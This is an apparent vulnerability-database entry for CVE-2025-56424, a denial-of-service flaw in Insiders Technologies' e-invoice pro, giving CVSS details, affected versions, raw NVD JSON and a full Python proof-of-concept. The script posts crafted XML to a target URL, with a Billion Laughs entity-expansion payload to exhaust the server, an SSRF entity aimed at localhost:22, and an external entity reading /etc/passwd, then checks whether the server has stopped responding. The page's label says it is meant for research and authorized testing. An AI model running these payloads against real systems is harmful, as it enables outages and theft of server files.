Security Vulnerability Report
CVE-2025-56424 CVSS 7.5 HIGH

CVE-2025-56424

Published: 2026-01-08 17:15:48
Last Modified: 2026-01-12 17:15:33

Description

An issue in Insiders Technologies GmbH e-invoice pro before release 1 Service Pack 2 allows a remote attacker to cause a denial of service via a crafted script

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:insiders-technologies:e-invoice_pro:1.0:-:*:*:*:*:*:* - VULNERABLE
e-invoice pro release 1 < Service Pack 2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-56424 PoC - e-invoice pro XXE Injection leading to DoS Note: This PoC is for educational and authorized testing purposes only. """ import requests import argparse import time def create_xxe_payload(payload_type='dos'): """Generate XXE payload based on attack type""" if payload_type == 'dos': # Billion Laughs attack - resource exhaustion payload = '''<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> ]> <root>&lol5;</root>''' elif payload_type == 'ssrf': # Server-Side Request Forgery payload = '''<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://localhost:22"> ]> <root>&xxe;</root>''' elif payload_type == 'file_read': # Local file read payload = '''<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root>''' else: payload = '''<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]> <root>&xxe;</root>''' return payload def exploit_xxe(target_url, payload_type='dos', timeout=30): """Send XXE payload to target""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/xml', } payload = create_xxe_payload(payload_type) print(f"[*] Target: {target_url}") print(f"[*] Payload type: {payload_type}") print(f"[*] Sending malicious XML payload...") try: response = requests.post( target_url, data=payload, headers=headers, timeout=timeout, verify=False ) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") if response.status_code != 200: print("[*] Server may have rejected the request or crashed") return True if payload_type == 'dos': 
# Check if server is still responsive time.sleep(2) try: health_check = requests.get( target_url.replace('/upload', '/health').replace('/process', '/health'), timeout=10 ) print("[!] Server still responsive - DoS may require multiple requests") except: print("[+] Server appears to be unresponsive - DoS successful") return True return False except requests.exceptions.Timeout: print("[+] Timeout detected - Server may be processing malicious payload") return True except requests.exceptions.ConnectionError: print("[+] Connection failed - Server may be down") return True except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-56424 XXE PoC') parser.add_argument('-t', '--target', required=True, help='Target URL') parser.add_argument('-p', '--payload', default='dos', choices=['dos', 'ssrf', 'file_read'], help='Payload type') parser.add_argument('--timeout', type=int, default=30, help='Request timeout') args = parser.parse_args() exploit_xxe(args.target, args.payload, args.timeout)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56424", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:47.840", "lastModified": "2026-01-12T17:15:32.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Insiders Technologies GmbH e-invoice pro before release 1 Service Pack 2 allows a remote attacker to cause a denial of service via a crafted script"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:insiders-technologies:e-invoice_pro:1.0:-:*:*:*:*:*:*", "matchCriteriaId": "3295CE0B-8050-4328-B816-714C5E9A0E27"}]}]}], "references": [{"url": "https://insiders-technologies.com/en/e-invoice/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://mind-bytes.de/xml-external-entity-xxe-injection-in-e-invoice-pro-cve-2025-56424/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}